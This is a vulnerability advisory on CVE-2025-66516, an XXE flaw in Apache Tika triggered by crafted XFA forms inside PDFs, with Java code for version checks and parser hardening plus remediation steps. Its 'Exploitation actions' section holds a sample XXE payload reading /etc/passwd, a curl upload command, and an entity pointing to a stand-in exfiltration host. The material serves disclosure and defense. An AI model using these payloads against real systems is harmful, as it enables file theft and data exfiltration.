Apache Tika: XML External Entity (XXE) injection (CVE-2025-66516)

Summary

Welcome to Security Spotlight. Today’s episode covers CVE-2025-66516, a critical XXE vulnerability in Apache Tika with the maximum CVSS score of 10.0. Attackers can embed a crafted XFA file inside a PDF to trigger XML External Entity injection, potentially exposing sensitive data or making the server issue requests to attacker-chosen destinations.

Product details

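This vulnerability affects three Apache Tika components: tika-core versions 1.13 through 3.2.1, tika-pdf-module (named tika-parser-pdf-module in the CVE description) versions 2.0.0 through 3.2.1, and tika-parsers versions 1.13 through 1.28.5, which the CVE record expresses as every release from 1.13 up to, but not including, 2.0.0. Apache Tika is a content analysis toolkit used to extract text and metadata from diverse file formats in Java applications.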
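The affected ranges can be turned into a quick dependency check. The following is a minimal sketch, assuming the ranges given in the CVE record quoted under "CVE database technical details" and purely numeric version strings; the class and method names are hypothetical, and tika-parser-pdf-module is the artifact name used in the CVE description.

```java
class TikaAffectedCheck {

    // Compare dotted numeric versions such as "3.2.1"; missing parts count as 0.
    // Assumes purely numeric components (no "-SNAPSHOT" or "-BETA" suffixes).
    static int compareVersions(String a, String b) {
        String[] pa = a.split("\\.");
        String[] pb = b.split("\\.");
        int n = Math.max(pa.length, pb.length);
        for (int i = 0; i < n; i++) {
            int x = i < pa.length ? Integer.parseInt(pa[i]) : 0;
            int y = i < pb.length ? Integer.parseInt(pb[i]) : 0;
            if (x != y) {
                return Integer.compare(x, y);
            }
        }
        return 0;
    }

    // True when low <= v <= high (or v < high when highInclusive is false).
    static boolean inRange(String v, String lowInclusive, String high, boolean highInclusive) {
        int cmpHigh = compareVersions(v, high);
        return compareVersions(v, lowInclusive) >= 0
                && (highInclusive ? cmpHigh <= 0 : cmpHigh < 0);
    }

    // Ranges copied from the CVE record; unknown artifacts are reported as not affected.
    static boolean isAffected(String artifact, String version) {
        switch (artifact) {
            case "tika-core":
                return inRange(version, "1.13", "3.2.1", true);
            case "tika-parser-pdf-module":
                return inRange(version, "2.0.0", "3.2.1", true);
            case "tika-parsers":
                return inRange(version, "1.13", "2.0.0", false);
            default:
                return false;
        }
    }

    public static void main(String[] args) {
        System.out.println(isAffected("tika-core", "3.2.1"));              // true
        System.out.println(isAffected("tika-core", "3.2.2"));              // false
        System.out.println(isAffected("tika-parsers", "1.28.5"));          // true
        System.out.println(isAffected("tika-parser-pdf-module", "3.2.2")); // false
    }
}
```

Each artifact needs its own check, because a fixed PDF module combined with an old tika-core is still an affected deployment.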

Vulnerability type summary

CVE-2025-66516 is an XML External Entity (XXE) injection flaw, classified under CWE-611. XXE occurs when an XML parser processes untrusted input containing external entity references, enabling attackers to read local files, perform server-side request forgery, or launch denial-of-service attacks.
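The usual defense against this class of flaw is to stop the parser from ever processing a DTD. The following is a minimal sketch in plain JAXP, assuming the JDK's built-in parser (which recognizes the Xerces-style feature URIs used below); it is not Tika's own code, and the class name HardenedDomParser is hypothetical.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

class HardenedDomParser {

    // Build a factory that refuses DOCTYPE declarations and external entities.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Rejecting any DOCTYPE removes the place where entities are declared.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth in case DOCTYPE handling is ever re-enabled.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    // Returns true when the hardened parser refuses the document.
    static boolean rejects(String xml) {
        try {
            DocumentBuilder builder = hardenedFactory().newDocumentBuilder();
            builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXException e) {
            return true; // parse error, including "DOCTYPE is disallowed"
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException("Parser setup or I/O failed", e);
        }
    }

    public static void main(String[] args) {
        String hostile = "<!DOCTYPE x [<!ENTITY e SYSTEM \"file:///etc/passwd\">]><x>&e;</x>";
        System.out.println(rejects(hostile));      // hostile document is refused
        System.out.println(rejects("<x>ok</x>"));  // plain document parses
    }
}
```

Because the DOCTYPE is refused before any entity is declared, the file named in the hostile document is never opened.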

Details of the vulnerability

Researchers discovered that crafted XFA streams embedded in PDF documents bypass tika-core’s default protections, allowing external entity resolution. Although the initial entry point was the tika-pdf-module (CVE-2025-54988), the root cause and fix reside in tika-core. Users who updated only the parser module but not tika-core remained vulnerable. Additionally, in 1.x releases, PDFParser lives in tika-parsers, expanding the affected scope.
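To make "external entity resolution" concrete at the API level, here is a minimal sketch using the standard JAXP SAX API. It installs an EntityResolver that answers every external entity with empty input, so nothing is read from disk or fetched over the network. This is a general defense-in-depth technique and an assumption for illustration, not a description of the actual change made in tika-core; the class name is hypothetical.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.DefaultHandler;

class IgnoringResolverDemo {

    // Parse the XML and return its character content, with all external
    // entities replaced by empty input instead of being dereferenced.
    static String parseText(String xml) {
        try {
            SAXParserFactory factory = SAXParserFactory.newInstance();
            factory.setNamespaceAware(true);
            XMLReader reader = factory.newSAXParser().getXMLReader();

            // The resolver is consulted before the parser opens a file or URL.
            reader.setEntityResolver(
                    (publicId, systemId) -> new InputSource(new StringReader("")));

            StringBuilder text = new StringBuilder();
            reader.setContentHandler(new DefaultHandler() {
                @Override
                public void characters(char[] ch, int start, int length) {
                    text.append(ch, start, length);
                }
            });
            reader.parse(new InputSource(new StringReader(xml)));
            return text.toString();
        } catch (ParserConfigurationException | SAXException | IOException e) {
            throw new IllegalStateException("XML parsing failed", e);
        }
    }

    public static void main(String[] args) {
        String xml = "<!DOCTYPE a [<!ENTITY e SYSTEM \"file:///nonexistent/xxe-demo\">]>"
                + "<a>x&e;y</a>";
        // The entity expands to nothing, so only the literal text survives.
        System.out.println(parseText(xml));
    }
}
```

Refusing the DOCTYPE outright is the stricter option; an ignoring resolver is useful where documents with harmless DTDs must still parse.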

Conclusion

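To mitigate CVE-2025-66516, upgrade all Apache Tika components together: tika-core and tika-pdf-module to version 3.2.2 or later. The CVE record lists every tika-parsers release below 2.0.0 as affected, so deployments still on tika-parsers 1.x should plan a migration to a release line that ships the fixed tika-core (3.2.2 or later). Review your code for custom XML parser configurations and disable external entity processing. Stay alert for upstream patches and apply them promptly to defend against XXE exploits.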

Remediation and exploitation details

This chain involves the following actors

  • Attacker: External adversary who crafts malicious PDF payloads
  • System Administrator: Maintains and updates Apache Tika deployments

The following systems are involved

  • Apache Tika Core (Central parsing engine for XML and other document formats): Performs XML processing and resolves entities
  • Apache Tika PDF Module (Parses PDF documents, including XFA forms): Entry point where the malicious XFA payload is handed off
  • Apache Tika Parsers (Collection of language‐specific and format‐specific parsers): In 1.x releases, hosts the PDFParser that processes XFA

Attack entry point

  • Crafted XFA payload in PDF: A PDF file embedding an XFA form that defines an external XML entity pointing to sensitive data or a remote endpoint

Remediation actions

  • System Administrator: Upgrade tika-core to version 3.2.2 or later (Apache Tika Core)
  • System Administrator: Upgrade tika-pdf-module to version 3.2.2 or later (Apache Tika PDF Module)
  • System Administrator: Migrate deployments that use tika-parsers 1.x to a release line that ships the fixed tika-core (3.2.2 or later); the CVE record lists every tika-parsers release below 2.0.0 as affected (Apache Tika Parsers)
  • Developer: Disable external entity resolution in any custom XML parser configuration (tika-core XML parser settings)
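For application code that builds its own streaming XML parser, the last remediation item can be sketched with the standard StAX API. This is a minimal sketch under the assumption that the application uses javax.xml.stream directly; it says nothing about how Tika configures its parsers internally, and the class name HardenedStax is hypothetical.

```java
import java.io.StringReader;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

class HardenedStax {

    // Factory with DTD processing and external entities switched off.
    static XMLInputFactory hardenedFactory() {
        XMLInputFactory f = XMLInputFactory.newInstance();
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return f;
    }

    // Collect character content; a document the parser refuses surfaces
    // as an IllegalStateException wrapping the XMLStreamException.
    static String text(String xml) {
        try {
            XMLStreamReader reader =
                    hardenedFactory().createXMLStreamReader(new StringReader(xml));
            StringBuilder sb = new StringBuilder();
            while (reader.hasNext()) {
                if (reader.next() == XMLStreamConstants.CHARACTERS) {
                    sb.append(reader.getText());
                }
            }
            reader.close();
            return sb.toString();
        } catch (XMLStreamException e) {
            throw new IllegalStateException("XML rejected or malformed", e);
        }
    }

    public static void main(String[] args) {
        System.out.println(text("<a>hi</a>"));
    }
}
```

How a hostile document fails (an exception versus an empty expansion) can differ between StAX implementations, so callers should treat both outcomes as acceptable and only verify that no external content appears in the output.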

Exploitation actions

Define an external entity referencing file:///etc/passwd or http://evil.example.com/collect

  • Actor: Attacker
  • Action: Create a PDF with an XFA section containing a malicious DOCTYPE
  • System or tool: Any authoring tool or script that can embed XFA
  • Example: <!DOCTYPE xfa [<!ENTITY exfil SYSTEM "file:///etc/passwd">]>

Upload or email the PDF to trigger automatic parsing

  • Actor: Attacker
  • Action: Submit the malicious PDF to a service that uses Apache Tika for content extraction
  • System or tool: Web application or service endpoint that invokes Tika
  • Example: curl -F "file=@malicious.pdf" https://example.com/parse

XXE injection via unhardened XML parser configuration

  • Actor: Apache Tika Core
  • Action: Parse the PDF and pass the XFA payload to its XML parser with external entity support enabled
  • System or tool: tika-core ≤ 3.2.1
  • Example: String text = new Tika().parseToString(TikaInputStream.get(pdfStream));

Entity resolution leads to inclusion of sensitive content

  • Actor: Apache Tika Core
  • Action: Resolve the external entity, loading a local file or fetching a remote resource
  • System or tool: tika-core XML processor
  • Example: Parsed output contains the contents of /etc/passwd or the attacker host's response

Data exfiltration via returned API response or log aggregation

  • Actor: Attacker
  • Action: Retrieve and analyze the parsed output or logs to extract sensitive data
  • System or tool: Application logs, response payload, or storage where parsed text is saved
  • Example: Response body: "root:x:0:0:root:/root:/bin/bash…"

Related Content

NOTE: The following related content has not been vetted and may be unsafe.

CVE database technical details

CVE ID
CVE-2025-66516
Description
Critical XXE in Apache Tika tika-core (1.13-3.2.1), tika-pdf-module (2.0.0-3.2.1) and tika-parsers (1.13-1.28.5) modules on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. This CVE covers the same vulnerability as in CVE-2025-54988. However, this CVE expands the scope of affected packages in two ways. First, while the entrypoint for the vulnerability was the tika-parser-pdf-module as reported in CVE-2025-54988, the vulnerability and its fix were in tika-core. Users who upgraded the tika-parser-pdf-module but did not upgrade tika-core to >= 3.2.2 would still be vulnerable. Second, the original report failed to mention that in the 1.x Tika releases, the PDFParser was in the "org.apache.tika:tika-parsers" module.
Provider
apache
CWE / problem types
CWE-611 Improper Restriction of XML External Entity Reference
Affected Software Versions
  • Apache Software Foundation, Apache Tika core: 1.13 through 3.2.1 inclusive (semver)
  • Apache Software Foundation, Apache Tika parsers: 1.13 up to, but not including, 2.0.0 (semver)
  • Apache Software Foundation, Apache Tika PDF parser module: 2.0.0 through 3.2.1 inclusive (semver)
Date Published
2025-12-04T16:17:24.980Z
Last Updated
2025-12-05T18:26:45.375Z